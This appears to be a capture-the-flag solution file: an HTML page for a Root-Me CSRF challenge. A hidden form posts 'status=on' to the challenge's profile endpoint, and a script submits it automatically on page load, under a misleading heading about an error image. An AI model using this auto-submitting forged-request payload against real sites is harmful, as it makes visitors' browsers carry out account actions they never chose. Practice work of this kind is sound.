You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
12 lines
359 B
12 lines
359 B
<h1>Ci-dessous L'image de l'erreur</h1>
|
|
|
|
<form id="pl" method="POST" action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile">
|
|
<input hidden name="username" value="a">
|
|
<input hidden name="status" value="on">
|
|
</form>
|
|
|
|
<script>
|
|
console.log("test");
|
|
form_pl = document.getElementById("pl");
|
|
form_pl.submit();
|
|
</script> |